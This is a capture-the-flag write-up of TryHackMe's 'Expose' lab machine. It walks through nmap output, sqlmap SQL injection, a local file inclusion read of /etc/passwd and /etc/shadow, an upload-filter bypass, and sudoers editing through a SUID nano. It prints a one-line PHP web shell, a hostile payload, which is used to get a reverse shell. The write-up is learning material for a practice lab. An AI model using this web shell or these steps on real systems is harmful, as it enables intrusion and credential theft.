Intro
Hi, after some time, I write again a small WriteUp. Today it's about the CTF "Expose". This CTF-Challenge can be found at the platform TryHackMe. You have to find 2 flags in this challenge. Here to simply create an account, and off you go 😄
Discovery
Ok lets go! The first thing what i've done is to run an nmap scan on the target ip address 10.10.180.99
. After some time I got the results below which sounds interesting.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-10-01 16:40 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating Ping Scan at 16:40
Scanning 10.10.180.99 [4 ports]
Completed Ping Scan at 16:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:40
Completed Parallel DNS resolution of 1 host. at 16:40, 0.04s elapsed
Initiating SYN Stealth Scan at 16:40
Scanning 10.10.180.99 [65535 ports]
Discovered open port 22/tcp on 10.10.180.99
Discovered open port 53/tcp on 10.10.180.99
Discovered open port 21/tcp on 10.10.180.99
Discovered open port 1337/tcp on 10.10.180.99
Discovered open port 1883/tcp on 10.10.180.99
Completed SYN Stealth Scan at 16:40, 17.52s elapsed (65535 total ports)
Initiating Service scan at 16:40
Scanning 5 services on 10.10.180.99
Completed Service scan at 16:40, 11.23s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.180.99
Retrying OS detection (try #2) against 10.10.180.99
Retrying OS detection (try #3) against 10.10.180.99
Retrying OS detection (try #4) against 10.10.180.99
Retrying OS detection (try #5) against 10.10.180.99
Initiating Traceroute at 16:40
Completed Traceroute at 16:40, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:40
Completed Parallel DNS resolution of 2 hosts. at 16:40, 0.08s elapsed
NSE: Script scanning 10.10.180.99.
Initiating NSE at 16:40
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 16:40, 8.68s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.37s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.01s elapsed
Nmap scan report for 10.10.180.99
Host is up (0.045s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.4.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:24:e4:a3:07:8b:bb:9f:e6:57:4f:5b:6e:30:d3:d2 (RSA)
| 256 1c:c5:28:08:0a:2c:5f:b2:55:8f:ba:9e:24:12:82:2f (ECDSA)
|_ 256 cd:e2:e2:92:ee:bf:59:03:fa:af:8a:f7:fb:f9:40:68 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: EXPOSED
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/publish/sent/1min: 28.32
| $SYS/broker/load/messages/received/15min: 0.20
| $SYS/broker/load/messages/received/5min: 0.58
| $SYS/broker/clients/active: 1
| $SYS/broker/bytes/received: 69
| $SYS/broker/load/bytes/received/1min: 60.29
| $SYS/broker/clients/maximum: 1
| $SYS/broker/messages/stored: 36
| $SYS/broker/clients/connected: 1
| $SYS/broker/subscriptions/count: 2
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/1min: 1.67
| $SYS/broker/load/sockets/5min: 0.38
| $SYS/broker/load/messages/sent/5min: 6.67
| $SYS/broker/load/publish/sent/5min: 6.09
| $SYS/broker/clients/inactive: 0
| $SYS/broker/publish/messages/sent: 31
| $SYS/broker/heap/maximum: 52384
| $SYS/broker/load/bytes/received/15min: 4.56
| $SYS/broker/load/sockets/1min: 1.55
| $SYS/broker/load/messages/received/1min: 2.59
| $SYS/broker/load/connections/15min: 0.13
| $SYS/broker/load/publish/sent/15min: 2.05
| $SYS/broker/bytes/sent: 1219
| $SYS/broker/uptime: 649 seconds
| $SYS/broker/load/connections/5min: 0.39
| $SYS/broker/heap/current: 51984
| $SYS/broker/load/sockets/15min: 0.13
| $SYS/broker/store/messages/count: 36
| $SYS/broker/store/messages/bytes: 156
| $SYS/broker/retained messages/count: 39
| $SYS/broker/publish/bytes/sent: 129
| $SYS/broker/load/bytes/sent/1min: 1113.17
| $SYS/broker/load/bytes/sent/15min: 80.77
| $SYS/broker/messages/sent: 34
| $SYS/broker/load/bytes/received/5min: 13.42
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/sent/5min: 239.36
| $SYS/broker/messages/received: 3
| $SYS/broker/load/messages/sent/15min: 2.25
| $SYS/broker/load/messages/sent/1min: 30.91
|_ $SYS/broker/clients/total: 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/1%OT=21%CT=1%CU=38251%PV=Y%DS=2%DC=T%G=Y%TM=6519
OS:84F8%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508S
OS:T11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)E
OS:CN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)
Uptime guess: 36.921 days (since Fri Aug 25 18:34:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 43.17 ms 10.11.0.1
2 44.47 ms 10.10.180.99
NSE: Script Post-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.26 seconds
Raw packets sent: 65809 (2.900MB) | Rcvd: 65733 (2.633MB)
Well, there are some interessting ports open!
VSFTPd on port 21
, which also allows anonymous login, defnitly that service which I want to checkout first. DNS (Bind9) on port 53/TCP
which may allows Zonetransfers. An HTTP on port 1337
which I should open with my browser. The last service is mosquitto on port 1883
, which is a message broker and mostly used for IoT. Intresting that we got several topics listed by nmap.
First of all I want to look at the files hosted on FTP. Nahh, we got nothing
I tried to upload somethine and got also an error message "permission denied". Well, this services is at the current point useless, but maybe useful later.
Zonetransfers with...
dig axfr 10.10.180.99
also doesn't worked for me and other dns request too. Which says something to me I had to look at the HTTP service on port 1337
.
Visiting port 1337
with my web browser shows me this page.
At the same time I let run nikto to discover some additional information about the http server running on port 1337
.
Well, we see that there is an admin directory
At the same time gobuster tells me there is also an phpmyadmin folder? Is that the way of the Challenge, that I have to brak into phpmyadmin somehow? Well first I want to find out what is behind the path /admin
Visisting the url "http://10.10.180.99:1337/admin/" show me this nice login
After some tries to get someting as error if I enter some dummy credentials, I got the thought about what if this login panel is fake? So I decided to look what I find under the path /phpmyadmin
. Ok what i thought it phpmyadmin. For me it was the trigger to search for the version of phpmyadmin and their vulnerabilities. Maybe I find an suitable exploit for that. But nothing!
I decided to subscribe all topics on the MQTT-Service on port 1883
, maybe I get more information.
Some minutes later I got suspicous, I overlook someting? I started again gobuster with an different wordlist to bruteforce the directories and may I get more. This time i used the default wordlists from dirb
to enumerate the directories.
And yes, I got more directories which I can look for.
The first directory i want to checkout is admin_101, may there is the non-fake admin panel. before i do that, i set an /etc/hosts entry expose.thm
to the ip address.
Well we see the email field is filled with the address "hacker@root.thm". Could that the real domain of the vm? I also added an entry to the /etc/hosts
where root.thm points to that ip address. I will enumerate the DNS subdomains with wfuzz later.
Well I entered the character a
as password for that user and I got an error. In the console of the developer tools I can see that there was an SQL query returned as response.
Ok, for me it's time to fire up sqlmap to test if there is an sql injection vulnerability. Few minutes later I got the response from sqlmap that the parameter email is vulnerable and i could dump the entire database.
And it's done. The whole database expose
was dumped
Initial access
The user hacker@root.thm
really exist in the table user
and his password is in cleartext stored in the table.
The table config
looks pretty interesting, because of the password hash and the files
The first file /file1010111/index.php
sounds interesting, because may there is an hidden admin panel? The second file /upload-cv00101011/index.php
, sounds for me like arbitray file uploads, but there more. The file can only used by an user which starts with the letter z
Well, I have to try the credentials on the admin panel.
Ok, a pretty nice startpage looks at me. This could be something like "ChatGPT". I analyzed the source code of this page but there was nothing. I think the that is not the right way and I have to look for the other two files listed in the table config
. First file which i visited was /file1010111/index.php
with the password from the config
table. And got this page.
Well, the page says to me "Parameter fuzzing is also important :) or Can you hide DOM elements?". I looked at the source code of this page and got the hint there is an GET paramenter file
or view
.
I tried first the parameter file
, may i've found a LFI? The first what I tried is to include the file /etc/passwd
from the target machine. And yeah it look like an LFI. I saved the contents of this file and analyzed them which users I possibly find on that system.
There are 2 users which I may have for upgrading my shell if I got inital access.
The first user is ubuntu
and the second is zeamkish
which starts with the letter z
I visited the second file and entered the username as the password and viola, I'm in.
Ok, I have an file upload here. May there is a chance of arbitrary file uploads where I can upload a shell. I created a simple php shell with the following code:
<?php echo system($_GET['id']);?>
This shell, I've saved as shell.php.png to bypass the extension filter. With BurpSuite, I used the repeater to edit my request to upload the shell as an php file. And it worked!
The next thing I've done is to create an reverse shell with msfvenom to get a better shell for initial accessing the files on that system.
With the same method I uploaded the shell and got the command shell session in metasploit, nice.
First flag
After getting initial access, I decided to read the files from the admin panel to get the database credentials which I can use for phpmyadmin.
I don't know why but I also listed the home directories of those both users, and i found an file called ssh_creds.txt
which everyone can ready, also me!
With this credentials I got an shell via ssh, which is definitly better that the reverse shell.
The first thing was for me to readout the file flag.txt
.
User:THM{USER_FLAG_1231_EXPOSE}
Escalating privileges
The next logical step would be to escalate the privileges to get root. This first what I've done was to enumerate all SUID binaries.
Searched and found! Why is the editor nano listed ad SUID binary?
Ok, well done i would say, I tested the editor to readout the file /etc/shadow
to list all user passwords on that system.
Now that I have potential root privileges, I have to maintain the priviliges to my current user zeamkish
. I just edited the file /etc/sudoers
to make this user to root.
Rootflag
Now I have to run sudo -i
and I should be logged in as root.
I'm root and here the root flag
root:THM{ROOT_EXPOSED_1001}
That concludes the challenge.
This challenge was fun to do as I found it very refreshing. So for beginners this is definitely recommended 😄
I hope you enjoyed it and see you next time 😄